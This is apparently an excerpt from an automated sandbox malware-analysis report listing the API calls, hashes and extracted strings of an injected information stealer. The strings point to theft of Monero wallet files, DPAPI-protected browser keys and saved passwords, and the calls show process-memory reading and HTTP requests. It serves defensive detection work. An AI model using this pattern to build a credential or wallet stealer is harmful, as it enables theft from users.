                                    • Instruction ID: 54f65e4aefd58bed6465f90c47cb03ff9a6001769afaa5de7fb8d6aecf6b5750
                                    • Opcode Fuzzy Hash: 0b0355dc1b839e8babd2d0bb1bf81017348c2fb3d56cda18870a90095a9a679d
                                    • Instruction Fuzzy Hash: F8A142B5A013189BDB64EFA4DC89FEE7379BF88300F048598E50D9A144DB749B84CFA1
                                    APIs
                                    • ??_U@YAPAXI@Z.MSVCRT ref: 03066B7E
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,03066DAD,030705AD), ref: 03066BBC
                                    • memset.MSVCRT ref: 03066C0A
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 03066D5E
                                    Strings
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 03066C2C
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: OpenProcessmemset
                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 1606381396-4138519520
                                    • Opcode ID: badaefe7f70b41c08da54284fb7f3e2e570b0146d048826e35e37adaa618e7f3
                                    • Instruction ID: 111cf73f84d6b732917026db8424ec754b1e60b35a9a05c6c425540fd85a7a0a
                                    • Opcode Fuzzy Hash: badaefe7f70b41c08da54284fb7f3e2e570b0146d048826e35e37adaa618e7f3
                                    • Instruction Fuzzy Hash: 975181B4D0131C9FDB54EF94DC84BEEB7B4AF84304F5441A8E2057A189EB756A84CF58
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 2221118986-218353709
                                    • Opcode ID: 069b18e6c1907183ea14fef4452b756e675ab9d467fe8efe346e14701e1b0c7c
                                    • Instruction ID: bdbb2e89dd3c90ac5edacf27ada9f957635344e23fe3bba390cc6db2f5b4e040
                                    • Opcode Fuzzy Hash: 069b18e6c1907183ea14fef4452b756e675ab9d467fe8efe346e14701e1b0c7c
                                    • Instruction Fuzzy Hash: D15152B5E512199BCB14FB64DC95FED733CAF94200F404198B60A7A085EF706B89CFA9
                                    APIs
                                      • Part of subcall function 030562D0: InternetOpenA.WININET(03070DE6,00000001,00000000,00000000,00000000,03070DE3), ref: 03056331
                                      • Part of subcall function 030562D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03056385
                                      • Part of subcall function 030562D0: HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 030563D5
                                      • Part of subcall function 030562D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 03056421
                                    • strtok.MSVCRT ref: 03064E7E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: HttpInternetOpenRequest$ConnectSendstrtok
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 1208788097-1526165396
                                    • Opcode ID: fa9b6cef1a2067ef51dc4b454eb1e928d7e80ca78ad3ffe19ad799d428f038d4
                                    • Instruction ID: 503103f778717a32fcd270f6dccbbe0e4153b3d62c3e9adaa9add538531bbab0
                                    • Opcode Fuzzy Hash: fa9b6cef1a2067ef51dc4b454eb1e928d7e80ca78ad3ffe19ad799d428f038d4
                                    • Instruction Fuzzy Hash: 7E5100B8A12208DFCB18FF64DD95EED7779AF90200F508018E9066F598EF706B05CB61
                                    APIs
                                    • __lock.LIBCMT ref: 0306AD5A
                                      • Part of subcall function 0306A97C: __mtinitlocknum.LIBCMT ref: 0306A992
                                      • Part of subcall function 0306A97C: __amsg_exit.LIBCMT ref: 0306A99E
                                      • Part of subcall function 0306A97C: EnterCriticalSection.KERNEL32(?,?,?,0306A630,0000000E,0307A088,0000000C,0306A5FA), ref: 0306A9A6
                                    • DecodePointer.KERNEL32(0307A0C8,00000020,0306AE9D,?,00000001,00000000,?,0306AEBF,000000FF,?,0306A9A3,00000011,?,?,0306A630,0000000E), ref: 0306AD96
                                    • DecodePointer.KERNEL32(?,0306AEBF,000000FF,?,0306A9A3,00000011,?,?,0306A630,0000000E,0307A088,0000000C,0306A5FA), ref: 0306ADA7
                                      • Part of subcall function 0306B7F5: EncodePointer.KERNEL32(00000000,0306BA52,0307BDB8,00000314,00000000,?,?,?,?,?,0306B0C8,0307BDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0306B7F7
                                    • DecodePointer.KERNEL32(-00000004,?,0306AEBF,000000FF,?,0306A9A3,00000011,?,?,0306A630,0000000E,0307A088,0000000C,0306A5FA), ref: 0306ADCD
                                    • DecodePointer.KERNEL32(?,0306AEBF,000000FF,?,0306A9A3,00000011,?,?,0306A630,0000000E,0307A088,0000000C,0306A5FA), ref: 0306ADE0
                                    • DecodePointer.KERNEL32(?,0306AEBF,000000FF,?,0306A9A3,00000011,?,?,0306A630,0000000E,0307A088,0000000C,0306A5FA), ref: 0306ADEA
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                    • String ID:
                                    • API String ID: 2005412495-0
                                    • Opcode ID: 5bd1388f80e04756f9027680f3c882a7c50a082a73c846b72ec5d4d04d98d078
                                    • Instruction ID: c3c158f129e6f6aba23daaa97f7bfb537715b468e85ca1cb6b056c061e056833
                                    • Opcode Fuzzy Hash: 5bd1388f80e04756f9027680f3c882a7c50a082a73c846b72ec5d4d04d98d078
                                    • Instruction Fuzzy Hash: 303128B4E02309DFDF50FFA9D8447DEBAF4BB48221F14802AD511BA248DBB88945CF65
                                    APIs
                                    • __getptd.LIBCMT ref: 0306C3D9
                                      • Part of subcall function 0306B95F: __getptd_noexit.LIBCMT ref: 0306B962
                                      • Part of subcall function 0306B95F: __amsg_exit.LIBCMT ref: 0306B96F
                                    • __amsg_exit.LIBCMT ref: 0306C3F9
                                    • __lock.LIBCMT ref: 0306C409
                                    • InterlockedDecrement.KERNEL32(?), ref: 0306C426
                                    • free.MSVCRT(?,?,?,00000003,0306B5E0,0307A108,00000008), ref: 0306C439
                                    • InterlockedIncrement.KERNEL32(0307B558), ref: 0306C451
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                    • String ID:
                                    • API String ID: 634100517-0
                                    • Opcode ID: 86c6c7a5c1e49ffbd69aee8fa44f4ef9d1ed6477f13176d40281ff9c1ea0d592
                                    • Instruction ID: 6ce81638827312ce0557056b2e1a9e9271ce6ae2b8cde3562a2a8fe6d2caea23
                                    • Opcode Fuzzy Hash: 86c6c7a5c1e49ffbd69aee8fa44f4ef9d1ed6477f13176d40281ff9c1ea0d592
                                    • Instruction Fuzzy Hash: 0701D635E03B219BF761FB6990447AEB7E0BF84710F094049D855BB64CCB38A841CBE1
                                    APIs
                                    • strlen.MSVCRT ref: 030669BF
                                    • ??_U@YAPAXI@Z.MSVCRT ref: 030669ED
                                      • Part of subcall function 03066670: strlen.MSVCRT ref: 03066681
                                      • Part of subcall function 03066670: strlen.MSVCRT ref: 030666A5
                                    • VirtualQueryEx.KERNEL32(03066DAD,00000000,?,0000001C), ref: 03066A32
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 03066B53
                                      • Part of subcall function 03066880: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 03066898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                    • String ID: @
                                    • API String ID: 2950663791-2766056989
                                    • Opcode ID: d1676e09a3e437229ae1b3ee0748de699b719971dd61fba150f5e45f2d5557fb
                                    • Instruction ID: 1938fd2b153cc828890661fd0ccb6d0a8d9a09d8cda3337d65695a2ecf93abe2
                                    • Opcode Fuzzy Hash: d1676e09a3e437229ae1b3ee0748de699b719971dd61fba150f5e45f2d5557fb
                                    • Instruction Fuzzy Hash: 9751F6B5E0510DEBDB04CF98D981AEFB7B6FB88300F048519E915A7248D735AA51CBA1
                                    APIs
                                    • __getptd.LIBCMT ref: 0306C13D
                                      • Part of subcall function 0306B95F: __getptd_noexit.LIBCMT ref: 0306B962
                                      • Part of subcall function 0306B95F: __amsg_exit.LIBCMT ref: 0306B96F
                                    • __getptd.LIBCMT ref: 0306C154
                                    • __amsg_exit.LIBCMT ref: 0306C162
                                    • __lock.LIBCMT ref: 0306C172
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0306C186
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    • Opcode ID: 60020492dc4becc8406b4819c2fc635f4f5f8858f36af12cf7f80943f5b245bf
                                    • Instruction ID: 77f7f1b0683a677c90f624c7b00e3e80a51328cea236ec7eee5b881fee200e83
                                    • Opcode Fuzzy Hash: 60020492dc4becc8406b4819c2fc635f4f5f8858f36af12cf7f80943f5b245bf
                                    • Instruction Fuzzy Hash: 75F09076E877109BF761FB6D940178E73906F82720F194149D094BE2D9CB6495408B65
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID: %d MB$@
                                    • API String ID: 3732870572-3474575989
                                    • Opcode ID: 97585073db8602e3d42aaaf5063cd20bc891fa78db0847f91848acdf2e6b21e1
                                    • Instruction ID: d0a084c4e963a18ed96efe2152e215147d6504704f2c96c8dceaf3b9622f873d
                                    • Opcode Fuzzy Hash: 97585073db8602e3d42aaaf5063cd20bc891fa78db0847f91848acdf2e6b21e1
                                    • Instruction Fuzzy Hash: 1D215CB1E44318ABDB00DFD9DC49FAEB7B8FB44B14F108509F615BB284C77859008BA8
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memcmpmemset
                                    • String ID: @$v10
                                    • API String ID: 1065087418-24753345
                                    APIs
                                    • memcmp.MSVCRT ref: 03059DE2
                                      • Part of subcall function 03059BB0: memcpy.MSVCRT ref: 03059C16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memcmpmemcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 1784268899-738592651
                                    APIs
                                    • memset.MSVCRT ref: 03057354
                                    • task.LIBCPMTD ref: 03057595
                                      • Part of subcall function 03059290: vsprintf_s.MSVCRT ref: 030592AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memsettaskvsprintf_s
                                    • String ID: Password
                                    • API String ID: 2675463923-3434357891